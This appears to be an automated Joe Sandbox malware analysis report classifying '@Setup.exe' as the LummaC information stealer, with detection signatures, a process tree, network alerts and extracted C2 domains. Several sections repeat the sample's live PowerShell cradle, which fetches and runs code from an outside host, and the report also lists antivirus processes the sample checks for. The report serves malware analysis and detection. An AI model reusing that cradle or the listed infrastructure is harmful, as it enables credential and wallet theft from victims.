Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
@Setup.exe

Overview

General Information

Sample name:@Setup.exe
Analysis ID:1581466
MD5:fc4450b75ae409fe64d363e515b0aa5e
SHA1:5a89134156e826a4db8781398f6743721f2869a6
SHA256:3b4cc799a42605fb1d9cfca03eed962dc8aa735618250668de7d93bec186b5e4
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
LummaC encrypted strings found
PE file has nameless sections
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • @Setup.exe (PID: 1900 cmdline: "C:\Users\user\Desktop\@Setup.exe" MD5: FC4450B75AE409FE64D363E515B0AA5E)
    • powershell.exe (PID: 6020 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ? MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • NBKXWJSCH7YAAAADC9LJIYY.exe (PID: 2924 cmdline: "C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exe" MD5: 34B63F16F994365A2FC9263E87CD28E8)
      • NBKXWJSCH7YAAAADC9LJIYY.tmp (PID: 6308 cmdline: "C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmp" /SL5="$A0076,11205210,845824,C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exe" MD5: A62041070E18901131CBBE7825EC4EC7)
        • NBKXWJSCH7YAAAADC9LJIYY.exe (PID: 7128 cmdline: "C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exe" /VERYSILENT MD5: 34B63F16F994365A2FC9263E87CD28E8)
          • NBKXWJSCH7YAAAADC9LJIYY.tmp (PID: 6936 cmdline: "C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmp" /SL5="$C0070,11205210,845824,C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exe" /VERYSILENT MD5: A62041070E18901131CBBE7825EC4EC7)
            • timeout.exe (PID: 3096 cmdline: "timeout" 9 MD5: 100065E21CFBBDE57CBA2838921F84D6)
              • conhost.exe (PID: 412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 2112 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 2252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 2208 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 396 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 1076 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 2472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 4112 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 3964 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 4228 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 4592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 2844 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 4544 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 1508 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 2084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 5124 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 5916 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 2736 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 2008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 5768 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 4432 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • cmd.exe (PID: 2688 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 1396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • tasklist.exe (PID: 2056 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • find.exe (PID: 1860 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
            • vsv_tool.exe (PID: 2300 cmdline: "C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exe" MD5: C12ED31F29EF510393AE36661F44F102)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["hummskitnj.buzz", "cashfuzysao.buzz", "screwamusresz.buzz", "scentniej.buzz", "inherineau.buzz", "laborersquei.click", "rebuildeso.buzz", "prisonyfork.buzz", "appliacnesot.buzz"], "Build id": "hRjzG3--TRON"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.2276066232.00000000008F0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
      • 0x4bcfb:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
      00000000.00000003.1843735948.0000000000A3E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: @Setup.exe PID: 1900JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
          Process Memory Space: @Setup.exe PID: 1900JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: @Setup.exe PID: 1900JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              Click to see the 1 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: PowerShell Download and Execution Cradles
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\@Setup.exe", ParentImage: C:\Users\user\Desktop\@Setup.exe, ParentProcessId: 1900, ParentProcessName: @Setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, ProcessId: 6020, ProcessName: powershell.exe
              Sigma detected: Suspicious PowerShell Parameter Substring
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\@Setup.exe", ParentImage: C:\Users\user\Desktop\@Setup.exe, ParentProcessId: 1900, ParentProcessName: @Setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, ProcessId: 6020, ProcessName: powershell.exe
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\@Setup.exe", ParentImage: C:\Users\user\Desktop\@Setup.exe, ParentProcessId: 1900, ParentProcessName: @Setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, ProcessId: 6020, ProcessName: powershell.exe
              Sigma detected: PowerShell Web Download
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\@Setup.exe", ParentImage: C:\Users\user\Desktop\@Setup.exe, ParentProcessId: 1900, ParentProcessName: @Setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, ProcessId: 6020, ProcessName: powershell.exe
              Sigma detected: Usage Of Web Request Commands And Cmdlets
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\@Setup.exe", ParentImage: C:\Users\user\Desktop\@Setup.exe, ParentProcessId: 1900, ParentProcessName: @Setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, ProcessId: 6020, ProcessName: powershell.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\@Setup.exe", ParentImage: C:\Users\user\Desktop\@Setup.exe, ParentProcessId: 1900, ParentProcessName: @Setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?, ProcessId: 6020, ProcessName: powershell.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T20:23:18.002105+010020283713Unknown Traffic192.168.2.449731172.67.166.49443TCP
              2024-12-27T20:23:19.956817+010020283713Unknown Traffic192.168.2.449732172.67.166.49443TCP
              2024-12-27T20:23:22.407806+010020283713Unknown Traffic192.168.2.449734172.67.166.49443TCP
              2024-12-27T20:23:24.782155+010020283713Unknown Traffic192.168.2.449738172.67.166.49443TCP
              2024-12-27T20:23:27.141426+010020283713Unknown Traffic192.168.2.449740172.67.166.49443TCP
              2024-12-27T20:23:29.762192+010020283713Unknown Traffic192.168.2.449742172.67.166.49443TCP
              2024-12-27T20:23:31.908103+010020283713Unknown Traffic192.168.2.449743172.67.166.49443TCP
              2024-12-27T20:23:34.752549+010020283713Unknown Traffic192.168.2.449744172.67.166.49443TCP
              2024-12-27T20:23:38.671124+010020283713Unknown Traffic192.168.2.449745172.67.166.49443TCP
              2024-12-27T20:23:41.243554+010020283713Unknown Traffic192.168.2.449746185.161.251.21443TCP
              2024-12-27T20:23:43.165270+010020283713Unknown Traffic192.168.2.449747172.67.208.58443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T20:23:18.731342+010020546531A Network Trojan was detected192.168.2.449731172.67.166.49443TCP
              2024-12-27T20:23:20.728467+010020546531A Network Trojan was detected192.168.2.449732172.67.166.49443TCP
              2024-12-27T20:23:39.459519+010020546531A Network Trojan was detected192.168.2.449745172.67.166.49443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T20:23:18.731342+010020498361A Network Trojan was detected192.168.2.449731172.67.166.49443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T20:23:20.728467+010020498121A Network Trojan was detected192.168.2.449732172.67.166.49443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T20:23:44.051342+010020084381A Network Trojan was detected172.67.208.58443192.168.2.449747TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T20:23:25.616036+010020480941Malware Command and Control Activity Detected192.168.2.449738172.67.166.49443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-27T20:23:34.762314+010028438641A Network Trojan was detected192.168.2.449744172.67.166.49443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: @Setup.exeAvira: detected
              Antivirus detection for URL or domain
              Source: https://cegu.shop:443/8574262446/ph.txtAvira URL Cloud: Label: malware
              Source: https://cegu.shop/8574262446/ph.txth;Avira URL Cloud: Label: malware
              Found malware configuration
              Source: @Setup.exe.1900.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["hummskitnj.buzz", "cashfuzysao.buzz", "screwamusresz.buzz", "scentniej.buzz", "inherineau.buzz", "laborersquei.click", "rebuildeso.buzz", "prisonyfork.buzz", "appliacnesot.buzz"], "Build id": "hRjzG3--TRON"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exeReversingLabs: Detection: 15%
              Multi AV Scanner detection for submitted file
              Source: @Setup.exeReversingLabs: Detection: 23%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.2% probability
              Source: @Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.166.49:443 -> 192.168.2.4:49745 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49746 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.208.58:443 -> 192.168.2.4:49747 version: TLS 1.2
              Source: Binary string: wntdll.pdbUGP source: vsv_tool.exe, 00000025.00000002.3046312161.0000000044540000.00000004.00000800.00020000.00000000.sdmp, vsv_tool.exe, 00000025.00000002.3040984180.00000000441E8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: vsv_tool.exe, 00000025.00000002.3046312161.0000000044540000.00000004.00000800.00020000.00000000.sdmp, vsv_tool.exe, 00000025.00000002.3040984180.00000000441E8000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], AD68FE34h0_2_0093009E
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]0_2_0091E062
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]0_2_0091E1B7
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]0_2_0091E1A8
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then and esi, 80000000h0_2_008FA1EE
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]0_2_0091E152
              Source: C:\Users\user\Desktop\@Setup.exeCode function: 4x nop then mov word ptr [edx], cx0_2_0090621E
